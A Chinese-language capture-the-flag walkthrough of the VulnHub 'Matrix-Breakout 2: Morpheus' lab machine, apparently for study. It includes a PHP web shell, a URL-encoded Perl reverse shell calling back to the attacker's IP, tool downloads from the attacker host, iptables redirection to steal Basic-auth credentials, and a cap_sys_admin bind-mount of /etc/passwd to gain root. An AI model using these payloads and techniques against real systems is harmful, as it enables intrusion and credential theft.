VulnHub-matrix-breakout-2-morpheus-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       (Unknown)
192.168.60.2    00:50:56:e3:f6:57       (Unknown)
192.168.60.203  00:0c:29:bd:f4:d1       (Unknown)
192.168.60.254  00:50:56:e3:9f:ef       (Unknown)

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.984 seconds (129.03 hosts/sec). 4 responded
❯ export ip=192.168.60.203
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Real hackers hack time ⌛

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.203:22
Open 192.168.60.203:80
Open 192.168.60.203:81
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 20:00 CST
Initiating ARP Ping Scan at 20:00
Scanning 192.168.60.203 [1 port]
Completed ARP Ping Scan at 20:00, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:00
Completed Parallel DNS resolution of 1 host. at 20:00, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 20:00
Scanning 192.168.60.203 [3 ports]
Discovered open port 81/tcp on 192.168.60.203
Discovered open port 22/tcp on 192.168.60.203
Discovered open port 80/tcp on 192.168.60.203
Completed SYN Stealth Scan at 20:00, 0.04s elapsed (3 total ports)
Nmap scan report for 192.168.60.203
Host is up, received arp-response (0.0020s latency).
Scanned at 2025-02-23 20:00:39 CST for 0s

PORT   STATE SERVICE   REASON
22/tcp open  ssh       syn-ack ttl 64
80/tcp open  http      syn-ack ttl 64
81/tcp open  hosts2-ns syn-ack ttl 64
MAC Address: 00:0C:29:BD:F4:D1 (VMware)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.31 seconds
           Raw packets sent: 4 (160B) | Rcvd: 4 (160B)

浏览器访问80端口

有张图片以及一点提示 Trinity jaybeale inguardians

扫描一下目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.203
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 348]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.60.203/javascript/]
/robots.txt           (Status: 200) [Size: 47]
/graffiti.txt         (Status: 200) [Size: 139]
/graffiti.php         (Status: 200) [Size: 451]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

分别访问下

❯ curl $ip/robots.txt
There's no white rabbit here.  Keep searching!
这里没有白兔。继续搜索！
❯ curl http://192.168.60.203/graffiti.txt
Mouse here - welcome to the Nebby!
鼠标在这里 - 欢迎来到 Nebby
Make sure not to tell Morpheus about this graffiti wall.
It's just here to let us blow off some steam.
确保不要告诉莫菲斯关于这面涂鸦墙。它只是在这里让我们发泄一些情绪。

任意文件写入

有个涂鸦墙，可以随意发消息

发现存在存储型XSS

利用burpsuite抓一下包

得知可以随意执行文件名字，存在当前用户任意文件写入

尝试写个一句话木马

尝试执行

❯ curl http://192.168.60.204/test.php\?0\=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

反弹一个shell，发现nc没法弹过来，多次尝试发现可以使用perl

urlcode编码后再curl一下

❯ curl http://192.168.60.204/test.php\?0\=perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.60.100%22%3B%24p%3D4444%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fsh%20-i%22%29%3B%7D%3B%27

---

或者另一种方法是kali开启http服务利用wget下载反弹PHP Pentest Monkey，访问一下反弹shell.php即可

---

用户提权

监听一下端口

发现存在两个用户trinity cypher

❯ pwncat-cs -lp 4444
[13:45:24] Welcome to pwncat 🐈!                                                                                                       __main__.py:164
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
bound to 0.0.0.0:4444 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[13:46:57] received connection from 192.168.60.204:59124         bind.py:84
[13:46:58] 0.0.0.0:4444: upgrading from /usr/bin/dash to     manager.py:957
           /usr/bin/bash
[13:47:13] 192.168.60.204:59124: registered new host w/ db   manager.py:957
(local) pwncat$
(remote) www-data@morpheus:/var/www/html$ cat /etc/passwd |grep /bin/bash
root:x:0:0:root:/root:/bin/bash
trinity:x:1000:1000::/home/trinity:/bin/bash
cypher:x:1001:1001::/home/cypher:/bin/bash

拿到第一个flag了，根据提示要去我们去利用.cypher-neo.png图片

(remote) www-data@morpheus:/$ cat FLAG.txt
Flag 1!

You've gotten onto the system.  Now why has Cypher locked everyone out of it?

Can you find a way to get Cypher's password? It seems like he gave it to
Agent Smith, so Smith could figure out where to meet him.

Also, pull this image from the webserver on port 80 to get a flag.

/.cypher-neo.png

我下载到本地后，利用exiftool查看一下图片信息

发现图片是用imagemagick生成的

❯ exiftool .cypher-neo.png
ExifTool Version Number         : 13.00
File Name                       : .cypher-neo.png
Directory                       : .
File Size                       : 381 kB
File Modification Date/Time     : 2025:02:23 23:41:21+08:00
File Access Date/Time           : 2025:02:23 23:42:00+08:00
File Inode Change Date/Time     : 2025:02:23 23:41:45+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 853
Image Height                    : 480
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Gamma                           : 2.2
White Point X                   : 0.3127
White Point Y                   : 0.329
Red X                           : 0.64
Red Y                           : 0.33
Green X                         : 0.3
Green Y                         : 0.6
Blue X                          : 0.15
Blue Y                          : 0.06
Background Color                : 255 255 255
Modify Date                     : 2021:03:17 10:58:47
Warning                         : [minor] Text/EXIF chunk(s) found after PNG IDAT (may be ignored by some readers)
Datecreate                      : 2021-03-17T10:58:47+00:00
Datemodify                      : 2021-03-17T10:58:47+00:00
Software                        : https://imagemagick.org
Thumb Document Pages            : 1
Thumb Image Height              : 480
Thumb Image Width               : 853
Thumb Mimetype                  : image/png
Thumb M Time                    : 1615978727
Thumb Size                      : 329716B
Thumb URI                       : file:///tmp/thumblr/img120644856217080381
Image Size                      : 853x480
Megapixels                      : 0.409

magick可以利用加密文本加密图片，尝试过后，无果

考虑LSB隐写，也没有信息

遂换个方向，我怀疑这就是个烟雾弹

信息收集

查看ip发现还存在一个docker环境

(remote) www-data@morpheus:/tmp$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:bd:f4:d1 brd ff:ff:ff:ff:ff:ff
    altname enp2s1
    inet 192.168.60.204/24 brd 192.168.60.255 scope global dynamic ens33
       valid_lft 1725sec preferred_lft 1725sec
    inet6 fd15:4ba5:5a2b:1008:20c:29ff:febd:f4d1/64 scope global dynamic mngtmpaddr
       valid_lft 86400sec preferred_lft 14400sec
    inet6 fe80::20c:29ff:febd:f4d1/64 scope link
       valid_lft forever preferred_lft forever
3: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default
    link/ether 02:42:94:d9:00:66 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:94ff:fed9:66/64 scope link
       valid_lft forever preferred_lft forever
5: vethff06aaf@if4: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue master docker0 state UP group default
    link/ether 22:cb:2a:c9:32:bb brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet6 fe80::20cb:2aff:fec9:32bb/64 scope link
       valid_lft forever preferred_lft forever

我传了个pspy和linpeas.sh上去，跑一遍

(remote) www-data@morpheus:/tmp$ wget 192.168.60.100/linpeas.sh
--2025-02-24 06:26:09--  http://192.168.60.100/linpeas.sh
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 827739 (808K) [application/octet-stream]
Saving to: 'linpeas.sh'

linpeas.sh                              0%[                                linpeas.sh                            100%[=======================================================================>] 808.34K  --.-KB/s    in 0.004s

2025-02-24 06:26:09 (183 MB/s) - 'linpeas.sh' saved [827739/827739]

(remote) www-data@morpheus:/tmp$ wget 192.168.60.100/pspy64
--2025-02-24 06:26:14--  http://192.168.60.100/pspy64
Connecting to 192.168.60.100:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: 'pspy64'

pspy64                                  0%[                                pspy64                                100%[=======================================================================>]   2.96M  --.-KB/s    in 0.01s

2025-02-24 06:26:14 (251 MB/s) - 'pspy64' saved [3104768/3104768]

(remote) www-data@morpheus:/tmp$ chmod +x linpeas.sh
(remote) www-data@morpheus:/tmp$ chmod +x pspy64

虽然此靶机比较老了有个DirtyPipe的内核漏洞，但是请不要利用此漏洞进行提权，除了靶机就是这么设计的

我们就正常按照靶机作者期望让我们走的预期解，否则你完全体会不到后面提权的乐趣

发现python存在cap_sys_admin能力

Linux Capabilities - HackTricks

Files with capabilities (limited to 50):
/usr/bin/python3-9 cap_sys_admin=ep
/usr/bin/ping cap_net_raw=ep
/usr/sbin/xtables-legacy-multi cap_net_admin=ep
/usr/sbin/xtables-nft-multi cap_net_admin=ep

不过在当前www-data用户下没法执行

humans倒是可以执行

(remote) www-data@morpheus:/tmp$ ls -al /usr/bin/python3-9
-rwxr-x--- 1 root humans 5479736 Oct 28  2021 /usr/bin/python3-9

同时在81端口上有个Basic Authorization登录

看一下nginx的配置信息

其中auth_basic_user_file的这个hash是由apache生成的

drwxr-xr-x 2 root root 4096 Oct 28  2021 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 34 Oct 28  2021 /etc/nginx/sites-enabled/default -> /etc/nginx/sites-available/default
server {
        listen 81 default_server;
        listen [::]:81 default_server;
        root /var/nginx/html;
        auth_basic "Meeting Place";
        auth_basic_user_file /var/nginx/html/.htpasswd;
        index index.html index.htm index.nginx-debian.html;
        server_name _;
        location / {
                try_files $uri $uri/ =404;
        }
}
---------------------------
-rw-r--r-- 1 nginx nginx 45 Oct 28  2021 /var/nginx/html/.htpasswd
cypher:$apr1$e9o8Y7Om$5zgDW6WOO6Fl8rCC7jpvX0

发现81端口中的index.php存在一点提示

(remote) www-data@morpheus:/var/nginx/html$ cat index.html
<html><head><title>Meeting Place</title></head><body>

                <p>
                <center>
                <h2>Dinner to Discuss Zion</h2>
                </center>
                </p>
                <p>
                Agent Smith, if you want to break into Zion, meet me in 3 days at the steak house at the corner of Wabash and Lake.
                史密斯特工，如果你想闯入锡安，请三天后在沃巴什和湖角的牛排馆见我。
                <img   src="ignorance-bliss.png" >
                </p>
                <p>
                "I know this steak doesn't exist. I know that when I put it in my mouth, the Matrix is telling my brain that it is juicy and delicious. After nine years, you know what I realize? Ignorance is bliss."
                我知道这块牛排不存在。我知道当我把它放进嘴里时，矩阵会告诉我的大脑它多汁而且美味。九年后，你知道我意识到了什么吗？无知是福。
                </p>
        </body>
</html>

查看源代码中的图片

好像没有什么信息存在隐写

利用pspy64监测一下系统进程

你可以发现有个进程定时的向81端口发送信息

2025/02/24 07:39:01 CMD: UID=0     PID=17122  | /usr/sbin/CRON -f
2025/02/24 07:39:01 CMD: UID=0     PID=17123  | /bin/sh -c chown -R root /crew
2025/02/24 07:39:24 CMD: UID=0     PID=17129  | sleep 60
2025/02/24 07:39:39 CMD: UID=0     PID=17130  | (ionclean)
2025/02/24 07:39:39 CMD: UID=0     PID=17134  | /usr/bin/basic-auth-client 

不过你去查看这个程序会发现不存在本机上

猜测在docker中

(remote) www-data@morpheus:/tmp$ ls -al /usr/bin/basic-auth-client
ls: cannot access '/usr/bin/basic-auth-client': No such file or directory
(remote) www-data@morpheus:/tmp$ ping 172.17.0.2
PING 172.17.0.2 (172.17.0.2) 56(84) bytes of data.
64 bytes from 172.17.0.2: icmp_seq=1 ttl=64 time=0.046 ms
64 bytes from 172.17.0.2: icmp_seq=2 ttl=64 time=0.030 ms
^C
--- 172.17.0.2 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1007ms
rtt min/avg/max/mdev = 0.030/0.038/0.046/0.008 ms

该docker中的程序定时的连接到172.17.0.1宿主机中的81端口，模拟用户登录

iptables路由转发

因此我们可以利用iptables将81端口收到的请求转发到我们自己开一个端口中

(remote) www-data@morpheus:/tmp$ iptables -L
Chain INPUT (policy ACCEPT)
target     prot opt source               destination

Chain FORWARD (policy DROP)
target     prot opt source               destination
DOCKER-USER  all  --  anywhere             anywhere
DOCKER-ISOLATION-STAGE-1  all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere             ctstate RELATED,ESTABLISHED
DOCKER     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere
ACCEPT     all  --  anywhere             anywhere

Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination

Chain DOCKER (1 references)
target     prot opt source               destination

Chain DOCKER-ISOLATION-STAGE-1 (1 references)
target     prot opt source               destination
DOCKER-ISOLATION-STAGE-2  all  --  anywhere             anywhere
RETURN     all  --  anywhere             anywhere

Chain DOCKER-ISOLATION-STAGE-2 (1 references)
target     prot opt source               destination
DROP       all  --  anywhere             anywhere
RETURN     all  --  anywhere             anywhere

Chain DOCKER-USER (1 references)
target     prot opt source               destination
RETURN     all  --  anywhere             anywhere

通过监听8181端口，得到了凭证cypher:cache-prosy-proceeds-clue-expiate-ammo-pugilist

这密码是够长的

(remote) www-data@morpheus:/tmp$ iptables -A FORWARD -p tcp -d 172.17.0.1 --dport 81 -j ACCEPT
(remote) www-data@morpheus:/tmp$ iptables -A PREROUTING -t nat -i docker0 -p tcp --dport 81 -j DNAT --to 172.17.0.1:8181
(remote) www-data@morpheus:/tmp$ nc -lvp 8181
Listening on 0.0.0.0 8181
Connection received on 172.17.0.2 57934
GET / HTTP/1.1
Host: 172.17.0.1:81
User-Agent: Go-http-client/1.1
Authorization: Basic Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0
Accept-Encoding: gzip

(remote) www-data@morpheus:/tmp$ echo "Y3lwaGVyOmNhY2hlLXByb3N5LXByb2NlZWRzLWNsdWUtZXhwaWF0ZS1hbW1vLXB1Z2lsaXN0"|base64 -d
cypher:cache-prosy-proceeds-clue-expiate-ammo-pugilist

iptables: 这是命令本身，用于管理 Linux 上的 IP 包过滤规则。

-A FORWARD: 这部分表示在 FORWARD 链上添加（-A，即 append）一条新规则。FORWARD 链用于处理转发的数据包

-A PREROUTING: 表示在 PREROUTING 链上添加（-A，即 append）一条新规则。PREROUTING 链在数据包进入防火墙时处理。

-t nat: 指定规则所属的表为 nat（网络地址转换）。

-i docker0: 指定输入接口为 docker0（这是 Docker 创建的网络桥接接口）。

-p tcp: 指定协议为 TCP。

--dport 81: 指定目标端口为 81。

-j DNAT: 指定目标地址转换（DNAT）动作。

-j ACCEPT: 这部分表示如果数据包匹配前面的所有条件，则接受（ACCEPT）这个数据包。

--to 172.17.0.1:8181`: 将目标地址转换为 `172.17.0.1`，目标端口转换为 `8181

Root提权

利用此凭证登入ssh

cypher正好也是隶属于humans用户组中

❯ ssh [email protected]
The authenticity of host '192.168.60.204 (192.168.60.204)' can't be established.
ECDSA key fingerprint is SHA256:5lN4/ZmxBo1d2GfJ+D5fzrFNSvzczVZd+OkTv8uIggU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.204' (ECDSA) to the list of known hosts.
[email protected]'s password:
Linux morpheus 5.10.0-9-amd64 #1 SMP Debian 5.10.70-1 (2021-09-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Oct 28 06:54:49 2021 from 10.23.58.30
cypher@morpheus:~$ cat FLAG.txt
You've clearly gained access as user Cypher.

Can you find a way to get to root?

cypher@morpheus:~$ id
uid=1001(cypher) gid=1001(cypher) groups=1001(cypher),1002(humans)

利用cap_sys_admin提权即可

将root后面的x删除，再执行python命令即可

cypher@morpheus:~$ cp /etc/passwd .
cypher@morpheus:~$ vi passwd
cypher@morpheus:~$ /usr/bin/python3-9
Python 3.9.2 (default, Feb 28 2021, 17:03:44)
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from ctypes import *
>>> libc = CDLL("libc.so.6")
>>> libc.mount.argtypes = (c_char_p, c_char_p, c_char_p, c_ulong, c_char_p)
>>> MS_BIND = 4096
SyntaxError: EOL while scanning string literal
>>> source = b"/home/cypher/passwd"
>>> target = b"/etc/passwd"
>>> filesystemtype = b"none"
>>> options = b"rw"
>>> mountflags = MS_BIND
>>> libc.mount(source, target, filesystemtype, mountflags, options)
>>> exit()
cypher@morpheus:~$ su root
root@morpheus:/home/cypher# cd /root/
root@morpheus:~# ls
FLAG.txt
root@morpheus:~# cat FLAG.txt
You've won!

Let's hope Matrix: Resurrections rocks!

如果不利用内核提权的话，后面的步骤还是很有挑战的

进一步的话，可以看一下是如何实现模拟访问的

发现自己封装了个可执行程序，逆向具体的也不太会

root@morpheus:/home/cypher# docker ps
CONTAINER ID   IMAGE              COMMAND      CREATED       STATUS        PORTS     NAMES
c08573ce98d3   infinite-request   "/main.sh"   3 years ago   Up 10 hours             infinite-request
root@morpheus:/home/cypher# docker exec -it c085 /bin/bash
root@c08573ce98d3:/# cat main.sh
#!/bin/bash

while :
do
   /usr/bin/basic-auth-client
   sleep 60

done